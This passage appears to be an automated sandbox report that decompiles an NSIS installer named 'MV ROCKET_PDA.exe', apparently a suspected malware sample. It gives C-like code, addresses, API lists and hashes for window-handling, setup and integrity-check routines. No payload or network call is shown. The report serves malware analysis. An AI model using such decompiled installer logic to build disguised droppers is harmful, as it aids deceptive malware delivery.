									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x42e3f8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42ecac - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x429468 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E5C();
											goto L26;
										}
										E0040140B(_t127);
										 *0x429468 = _t127;
										goto L21;
									}
									__eflags =  *0x4091ac - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x42e3f8);
						 *0x42e3f8 = _a12;
						L58:
						if( *0x42b0a0 == _t133) {
							_t142 =  *0x42e3f8 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x42b0a0 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}
































                                                                                            0x004039b9
                                                                                            0x004039c2
                                                                                            0x00403b03
                                                                                            0x00403b07
                                                                                            0x00403b0b
                                                                                            0x00403b0d
                                                                                            0x00403b12
                                                                                            0x00403b1d
                                                                                            0x00403b28
                                                                                            0x00403b2d
                                                                                            0x00403b2f
                                                                                            0x00403b31
                                                                                            0x00403b34
                                                                                            0x00403b39
                                                                                            0x00403b47
                                                                                            0x00403b54
                                                                                            0x00403b5b
                                                                                            0x00403b5b
                                                                                            0x00403b5c
                                                                                            0x00403b5c
                                                                                            0x00403b61
                                                                                            0x00403b67
                                                                                            0x00403b6e
                                                                                            0x00403b74
                                                                                            0x00403b76
                                                                                            0x00403bb6
                                                                                            0x00403bbb
                                                                                            0x00403bc0
                                                                                            0x00403bc0
                                                                                            0x00403bc5
                                                                                            0x00403bce
                                                                                            0x00403bd0
                                                                                            0x00403bd5
                                                                                            0x00403bdb
                                                                                            0x00403bdf
                                                                                            0x00403bdf
                                                                                            0x00403be4
                                                                                            0x00403bea
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403bf0
                                                                                            0x00403bf5
                                                                                            0x00403bfb
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403c04
                                                                                            0x00403c0c
                                                                                            0x00403c11
                                                                                            0x00403c14
                                                                                            0x00403c1a
                                                                                            0x00403c1f
                                                                                            0x00403c22
                                                                                            0x00403c28
                                                                                            0x00403c2d
                                                                                            0x00403c30
                                                                                            0x00403c36
                                                                                            0x00403c3e
                                                                                            0x00403c44
                                                                                            0x00403c4a
                                                                                            0x00403c4e
                                                                                            0x00403c55
                                                                                            0x00403c55
                                                                                            0x00403c55
                                                                                            0x00403c5f
                                                                                            0x00403c71
                                                                                            0x00403c7d
                                                                                            0x00403c82
                                                                                            0x00403c8c
                                                                                            0x00403c92
                                                                                            0x00403c94
                                                                                            0x00403c99
                                                                                            0x00403c96
                                                                                            0x00403c96
                                                                                            0x00403c96
                                                                                            0x00403ca9
                                                                                            0x00403cc1
                                                                                            0x00403cc3
                                                                                            0x00403cc9
                                                                                            0x00403cde
                                                                                            0x00403ccb
                                                                                            0x00403cd4
                                                                                            0x00403cd6
                                                                                            0x00403cd6
                                                                                            0x00403ce4
                                                                                            0x00403cf4
                                                                                            0x00403d05
                                                                                            0x00403d0c
                                                                                            0x00403d12
                                                                                            0x00403d16
                                                                                            0x00403d1b
                                                                                            0x00403d1d
                                                                                            0x00000000
                                                                                            0x00403d23
                                                                                            0x00403d23
                                                                                            0x00403d25
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403d2b
                                                                                            0x00403d2f
                                                                                            0x00403d54
                                                                                            0x00403d5a
                                                                                            0x00403d60
                                                                                            0x00403d62
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403d88
                                                                                            0x00403d8e
                                                                                            0x00403d90
                                                                                            0x00403d95
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403d9b
                                                                                            0x00403d9e
                                                                                            0x00403da1
                                                                                            0x00403db8
                                                                                            0x00403dc4
                                                                                            0x00403ddd
                                                                                            0x00403de3
                                                                                            0x00403de7
                                                                                            0x00403dec
                                                                                            0x00403df2
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403dfc
                                                                                            0x00403e07
                                                                                            0x00000000
                                                                                            0x00403e07
                                                                                            0x00403d31
                                                                                            0x00403d37
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403d3d
                                                                                            0x00403d43
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403d49
                                                                                            0x00403d1d
                                                                                            0x00403e14
                                                                                            0x00403e20
                                                                                            0x00403e27
                                                                                            0x00000000
                                                                                            0x00403b78
                                                                                            0x00403b78
                                                                                            0x00403b7b
                                                                                            0x00403bae
                                                                                            0x00403bae
                                                                                            0x00403bb0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403bb0
                                                                                            0x00403b7d
                                                                                            0x00403b81
                                                                                            0x00403b86
                                                                                            0x00403b88
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403b98
                                                                                            0x00403ba0
                                                                                            0x00000000
                                                                                            0x00403ba6
                                                                                            0x004039d4
                                                                                            0x004039d4
                                                                                            0x004039d8
                                                                                            0x004039dd
                                                                                            0x004039ec
                                                                                            0x004039ec
                                                                                            0x004039f5
                                                                                            0x004039fe
                                                                                            0x00403a09
                                                                                            0x00403a09
                                                                                            0x00403a15
                                                                                            0x00403a31
                                                                                            0x00403a34
                                                                                            0x00403a47
                                                                                            0x00403a4d
                                                                                            0x00403af0
                                                                                            0x00000000
                                                                                            0x00403af9
                                                                                            0x00403a53
                                                                                            0x00403a60
                                                                                            0x00403a62
                                                                                            0x00403a64
                                                                                            0x00403a83
                                                                                            0x00403a83
                                                                                            0x00403a86
                                                                                            0x00403a8b
                                                                                            0x00403a8e
                                                                                            0x00403a9e
                                                                                            0x00403a9f
                                                                                            0x00403aa1
                                                                                            0x00403ad7
                                                                                            0x00403aea
                                                                                            0x00000000
                                                                                            0x00403aea
                                                                                            0x00403aa3
                                                                                            0x00403aa9
                                                                                            0x00403ac2
                                                                                            0x00403ac7
                                                                                            0x00403ac9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403acb
                                                                                            0x00403ab7
                                                                                            0x00403ab7
                                                                                            0x00403ab9
                                                                                            0x00403ab9
                                                                                            0x00000000
                                                                                            0x00403ab9
                                                                                            0x00403aac
                                                                                            0x00403ab1
                                                                                            0x00000000
                                                                                            0x00403ab1
                                                                                            0x00403a90
                                                                                            0x00403a96
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403a98
                                                                                            0x00000000
                                                                                            0x00403a98
                                                                                            0x00403a88
                                                                                            0x00000000
                                                                                            0x00403a88
                                                                                            0x00403a6e
                                                                                            0x00403a75
                                                                                            0x00403a7b
                                                                                            0x00403a7d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403a7d
                                                                                            0x00403a39
                                                                                            0x00000000
                                                                                            0x00403a17
                                                                                            0x00403a1d
                                                                                            0x00403a27
                                                                                            0x00403e2d
                                                                                            0x00403e33
                                                                                            0x00403e35
                                                                                            0x00403e3b
                                                                                            0x00403e40
                                                                                            0x00403e46
                                                                                            0x00403e46
                                                                                            0x00403e3b
                                                                                            0x00403e50
                                                                                            0x00000000
                                                                                            0x00403e50
                                                                                            0x00403a15

                                                                                            APIs
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039EC
                                                                                            • ShowWindow.USER32(?), ref: 00403A09
                                                                                            • DestroyWindow.USER32 ref: 00403A1D
                                                                                            • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A39
                                                                                            • GetDlgItem.USER32 ref: 00403A5A
                                                                                            • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A6E
                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403A75
                                                                                            • GetDlgItem.USER32 ref: 00403B23
                                                                                            • GetDlgItem.USER32 ref: 00403B2D
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403B47
                                                                                            • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B98
                                                                                            • GetDlgItem.USER32 ref: 00403C3E
                                                                                            • ShowWindow.USER32(00000000,?), ref: 00403C5F
                                                                                            • EnableWindow.USER32(?,?), ref: 00403C71
                                                                                            • EnableWindow.USER32(?,?), ref: 00403C8C
                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403CA2
                                                                                            • EnableMenuItem.USER32 ref: 00403CA9
                                                                                            • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403CC1
                                                                                            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CD4
                                                                                            • lstrlenA.KERNEL32(0042A0A0,?,0042A0A0,gqjlpjiaybpobgywdcz Setup), ref: 00403CFD
                                                                                            • SetWindowTextA.USER32(?,0042A0A0), ref: 00403D0C
                                                                                            • ShowWindow.USER32(?,0000000A), ref: 00403E40
                                                                                            Strings
                                                                                            • gqjlpjiaybpobgywdcz Setup, xrefs: 00403CEE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                                                                                            • String ID: gqjlpjiaybpobgywdcz Setup
                                                                                            • API String ID: 4050669955-1554613172
                                                                                            • Opcode ID: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
                                                                                            • Instruction ID: f9ad972cf69bfdf420a9f6130eb54bdd223da945896b7aa78364cccc95eacf8d
                                                                                            • Opcode Fuzzy Hash: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
                                                                                            • Instruction Fuzzy Hash: 9FC1D331604204AFDB21AF62ED45E2B3F6CEB44706F50053EF641B52E1C779A942DB5E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0040361A, Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 96%
                                                                                            			E0040361A(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t60;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				struct HINSTANCE__* _t76;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t85;

				_t81 =  *0x42ec30; // 0x5137d0
				_t20 = E00405F57(3);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x42a0a0;
					"1033" = 0x7830;
					E00405AAE(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a0a0, 0);
					__eflags =  *0x42a0a0;
					if(__eflags == 0) {
						E00405AAE(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407342, 0x42a0a0, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405B25("1033",  *_t20() & 0x0000ffff);
				}
				E004038E3(_t76, _t88);
				_t24 =  *0x42ec38; // 0x80
				_t84 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x42eca0 = _t24 & 0x00000020;
				 *0x42ecbc = 0x10000;
				if(E0040579B(_t88, "C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040579B(_t96, _t84) == 0) {
						E00405BE9(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x42ec20, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42e408 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E004038E3(_t76, __eflags);
							__eflags =  *0x42ecc0; // 0x0
							if(__eflags != 0) {
								_t31 = E00404F85(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42e3ec; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a078, 5); // executed
							_t37 = E00405EE9("RichEd20"); // executed
							__eflags = _t37;
							if(_t37 == 0) {
								E00405EE9("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x42e3c0);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42e3c0);
								 *0x42e3e4 = _t85;
								RegisterClassA(0x42e3c0);
							}
							_t39 =  *0x42e400; // 0x0
							_t42 = DialogBoxParamA( *0x42ec20, _t39 + 0x00000069 & 0x0000ffff, 0, E004039B0, 0); // executed
							E0040356A(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x42ec20; // 0x400000
						 *0x42e3d4 = _t28;
						_v20 = 0x624e5f;
						 *0x42e3c4 = E00401000;
						 *0x42e3d0 = _t76;
						 *0x42e3e4 =  &_v20;
						if(RegisterClassA(0x42e3c0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x42a078 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42ec20, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t60 =  *0x42ec58; // 0x517b50
					_t79 = 0x42dbc0;
					E00405AAE( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) + _t60, 0x42dbc0, 0);
					_t62 =  *0x42dbc0; // 0x67
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x42dbc1;
						 *((char*)(E004056E5(0x42dbc1, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405BC7(_t84, E004056BA(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E00405701(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}





























                                                                                            0x00403620
                                                                                            0x00403629
                                                                                            0x00403630
                                                                                            0x00403632
                                                                                            0x00403646
                                                                                            0x00403658
                                                                                            0x00403662
                                                                                            0x00403667
                                                                                            0x0040366d
                                                                                            0x00403680
                                                                                            0x00403680
                                                                                            0x0040368b
                                                                                            0x00403634
                                                                                            0x0040363f
                                                                                            0x0040363f
                                                                                            0x00403690
                                                                                            0x00403695
                                                                                            0x0040369a
                                                                                            0x004036a3
                                                                                            0x004036a8
                                                                                            0x004036b9
                                                                                            0x00403740
                                                                                            0x00403748
                                                                                            0x00403751
                                                                                            0x00403751
                                                                                            0x00403767
                                                                                            0x0040376d
                                                                                            0x0040377b
                                                                                            0x0040380a
                                                                                            0x00403812
                                                                                            0x0040381c
                                                                                            0x00403821
                                                                                            0x00403827
                                                                                            0x004038b1
                                                                                            0x004038b6
                                                                                            0x004038b8
                                                                                            0x004038d4
                                                                                            0x00000000
                                                                                            0x004038d4
                                                                                            0x004038ba
                                                                                            0x004038c0
                                                                                            0x004038c8
                                                                                            0x004038c8
                                                                                            0x00000000
                                                                                            0x004038c0
                                                                                            0x00403835
                                                                                            0x00403840
                                                                                            0x00403845
                                                                                            0x00403847
                                                                                            0x0040384e
                                                                                            0x0040384e
                                                                                            0x00403859
                                                                                            0x00403861
                                                                                            0x00403863
                                                                                            0x00403865
                                                                                            0x0040386e
                                                                                            0x00403871
                                                                                            0x00403877
                                                                                            0x00403877
                                                                                            0x0040387d
                                                                                            0x00403896
                                                                                            0x004038a7
                                                                                            0x00000000
                                                                                            0x004038ac
                                                                                            0x00403814
                                                                                            0x00403816
                                                                                            0x00000000
                                                                                            0x00403781
                                                                                            0x00403781
                                                                                            0x00403787
                                                                                            0x00403791
                                                                                            0x00403799
                                                                                            0x004037a3
                                                                                            0x004037a9
                                                                                            0x004037b7
                                                                                            0x004038d9
                                                                                            0x004038d9
                                                                                            0x00000000
                                                                                            0x004038d9
                                                                                            0x004037bd
                                                                                            0x004037c6
                                                                                            0x00403805
                                                                                            0x00000000
                                                                                            0x00403805
                                                                                            0x004036bf
                                                                                            0x004036bf
                                                                                            0x004036c4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004036c9
                                                                                            0x004036ce
                                                                                            0x004036de
                                                                                            0x004036e3
                                                                                            0x004036ea
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004036ee
                                                                                            0x004036f0
                                                                                            0x004036fd
                                                                                            0x004036fd
                                                                                            0x00403705
                                                                                            0x0040370b
                                                                                            0x00403733
                                                                                            0x0040373b
                                                                                            0x00000000
                                                                                            0x0040371d
                                                                                            0x0040371e
                                                                                            0x00403727
                                                                                            0x0040372d
                                                                                            0x0040372e
                                                                                            0x00000000
                                                                                            0x0040372e
                                                                                            0x00403729
                                                                                            0x0040372b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040372b
                                                                                            0x0040370b

                                                                                            APIs
                                                                                              • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                                                              • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                                                            • lstrcatA.KERNEL32(1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\MV ROCKET_PDA.exe" ,00000000), ref: 0040368B
                                                                                            • lstrlenA.KERNEL32(gqeqcda,?,?,?,gqeqcda,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 00403700
                                                                                            • lstrcmpiA.KERNEL32(?,.exe,gqeqcda,?,?,?,gqeqcda,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000), ref: 00403713
                                                                                            • GetFileAttributesA.KERNEL32(gqeqcda), ref: 0040371E
                                                                                            • LoadImageA.USER32 ref: 00403767
                                                                                              • Part of subcall function 00405B25: wsprintfA.USER32 ref: 00405B32
                                                                                            • RegisterClassA.USER32 ref: 004037AE
                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004037C6
                                                                                            • CreateWindowExA.USER32 ref: 004037FF
                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403835
                                                                                            • GetClassInfoA.USER32 ref: 00403861
                                                                                            • GetClassInfoA.USER32 ref: 0040386E
                                                                                            • RegisterClassA.USER32 ref: 00403877
                                                                                            • DialogBoxParamA.USER32 ref: 00403896
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                            • String ID: "C:\Users\user\Desktop\MV ROCKET_PDA.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$P{Q$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$gqeqcda
                                                                                            • API String ID: 1975747703-1290796938
                                                                                            • Opcode ID: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
                                                                                            • Instruction ID: 439cf4cca7a437fbaee012d0436cdd450a481f2d9ea16570e6e497c3a9acd7f8
                                                                                            • Opcode Fuzzy Hash: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
                                                                                            • Instruction Fuzzy Hash: 4861C6B16042007EE220BF629C45E273AACEB44759F44447FF941B62E2DB7DA9418A3E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00402C55, Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 80%
                                                                                            			E00402C55(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				signed int _t54;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\hardz\\Desktop\\MV ROCKET_PDA.exe";
				 *0x42ec2c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\MV ROCKET_PDA.exe", 0x400);
				_t89 = E0040589E(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409014 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\hardz\\Desktop";
				E00405BC7("C:\\Users\\hardz\\Desktop", _t91);
				E00405BC7(0x436000, E00405701(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x428c50 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BF1(1);
					__eflags =  *0x42ec34 - _t82; // 0x8800
					if(__eflags == 0) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						_t54 =  *0x42ec34; // 0x8800
						E004030E2(_t54 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402E8E(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42ec30 = _t94;
							 *0x42ec38 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42ec3c =  *0x42ec3c + 1;
								__eflags =  *0x42ec3c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E0040585F(0x42ec40, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004030E2( *0x414c40);
					_t65 = E004030B0( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t67 =  *0x42ec34; // 0x8800
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004030B0(0x420c50, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E00402BF1(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42ec34;
						if( *0x42ec34 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BF1(0);
							}
							goto L20;
						}
						E0040585F( &_v44, 0x420c50, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x414c40; // 0x8800
						 *0x42ecc0 =  *0x42ecc0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42ec34 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x428c50;
						if(_t93 <  *0x428c50) {
							_v12 = E00405FC6(_v12, 0x420c50, _t90);
						}
						 *0x414c40 =  *0x414c40 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

































                                                                                            0x00402c5d
                                                                                            0x00402c60
                                                                                            0x00402c63
                                                                                            0x00402c66
                                                                                            0x00402c6c
                                                                                            0x00402c7d
                                                                                            0x00402c82
                                                                                            0x00402c95
                                                                                            0x00402c9a
                                                                                            0x00402c9d
                                                                                            0x00402ca3
                                                                                            0x00000000
                                                                                            0x00402ca5
                                                                                            0x00402cb0
                                                                                            0x00402cb6
                                                                                            0x00402cc7
                                                                                            0x00402cce
                                                                                            0x00402cd4
                                                                                            0x00402cd6
                                                                                            0x00402cdb
                                                                                            0x00402cdd
                                                                                            0x00402dca
                                                                                            0x00402dcc
                                                                                            0x00402dd1
                                                                                            0x00402dd8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402dda
                                                                                            0x00402ddd
                                                                                            0x00402e01
                                                                                            0x00402e06
                                                                                            0x00402e0c
                                                                                            0x00402e0e
                                                                                            0x00402e17
                                                                                            0x00402e1c
                                                                                            0x00402e1f
                                                                                            0x00402e20
                                                                                            0x00402e21
                                                                                            0x00402e23
                                                                                            0x00402e28
                                                                                            0x00402e2b
                                                                                            0x00402e3e
                                                                                            0x00402e42
                                                                                            0x00402e4a
                                                                                            0x00402e4f
                                                                                            0x00402e51
                                                                                            0x00402e51
                                                                                            0x00402e51
                                                                                            0x00402e59
                                                                                            0x00402e59
                                                                                            0x00402e5c
                                                                                            0x00402e5d
                                                                                            0x00402e5d
                                                                                            0x00402e60
                                                                                            0x00402e62
                                                                                            0x00402e62
                                                                                            0x00402e62
                                                                                            0x00402e6c
                                                                                            0x00402e72
                                                                                            0x00402e80
                                                                                            0x00402e85
                                                                                            0x00000000
                                                                                            0x00402e85
                                                                                            0x00000000
                                                                                            0x00402e2b
                                                                                            0x00402de5
                                                                                            0x00402df0
                                                                                            0x00402df5
